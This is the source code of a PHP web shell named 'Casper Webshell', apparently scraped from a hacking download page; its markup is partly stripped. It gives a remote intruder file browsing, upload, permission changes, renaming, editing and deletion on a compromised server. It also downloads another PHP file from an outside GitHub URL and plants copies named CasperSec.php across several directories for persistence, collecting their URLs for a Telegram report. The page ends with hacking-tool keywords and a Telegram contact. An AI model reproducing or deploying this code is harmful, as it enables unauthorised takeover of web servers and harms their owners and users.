FORM; die($bytesecform); } } } ?> Casper Webshell


'; if(isset($_GET['filesrc'])){ echo "
Current Path : '; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } echo '
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo ''; }else{ echo ''; } } echo '
Upload File :
Current File : "; echo $_GET['filesrc']; echo '

'; echo('
'); }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'; if($_POST['opt'] == 'chmod'){ if(isset($_POST['perm'])){ if(chmod($_POST['path'],$_POST['perm'])){ echo ''; }else{ echo ''; } } echo '
Permission :
'; }elseif($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo ''; }else{ echo ''; } $_POST['name'] = $_POST['newname']; } echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w'); if(fwrite($fp,$_POST['src'])){ echo ''; }else{ echo ''; } fclose($fp); } echo '

'; } echo '
'; }else{ echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo ''; }else{ echo ''; } }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){ echo ''; }else{ echo ''; } } } echo '
'; echo ''; echo '

'; echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "\n "; } echo ''; foreach($scandir as $file){ if(!is_file("$path/$file")) continue; $size = filesize("$path/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB'; }else{ $size = $size.' KB'; } echo ""; } echo '
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo "
\" />
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo "
\" />
'; } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } $fileURL = 'https://raw.githubusercontent.com/spacebin-org/Casper/main/Waf.php'; $fileContent = file_get_contents($fileURL); $directories = glob('*', GLOB_ONLYDIR); if (count($directories) < 5) { $remainingCount = 5 - count($directories); $existingDirectories = array(); foreach ($directories as $directory) { $filePath = $directory . '/CasperSec.php'; file_put_contents($filePath, $fileContent); $existingDirectories[] = $directory; } // Send notification to Telegram for remaining directories $message = "Only " . $remainingCount . " directories available. Created CasperSec.php in existing directories."; // Send URLs of created files in existing directories $fileURLs = array(); foreach ($existingDirectories as $directory) { $fileURLs[] = getDirectoryURL($directory) . '/CasperSec.php'; } exit; } $selectedDirectories = array_rand($directories, 5); $createdDirectories = array(); foreach ($selectedDirectories as $index) { $directory = $directories[$index]; $filePath = $directory . '/CasperSec.php'; file_put_contents($filePath, $fileContent); $createdDirectories[] = $directory; } // Send URLs of created files in selected directories $fileURLs = array(); foreach ($createdDirectories as $directory) { $fileURLs[] = getDirectoryURL($directory) . '/CasperSec.php'; } function getDirectoryURL($directory) { $protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http'; $host = $_SERVER['HTTP_HOST']; $directory = ltrim($directory, '/'); return "$protocol://$host/$directory"; } ?>
Hacker Blog, Shell İndir, Sql İnjection, XSS Attacks, LFI Attacks, Social Hacking, Exploit Bot, Proxy Tools, Web Shell, PHP Shell, Alfa Shell İndir, Hacking Training Set, DDoS Script, Denial Of Service, Botnet, RFI Attacks, Encryption
Telegram @BIBIL_0DAY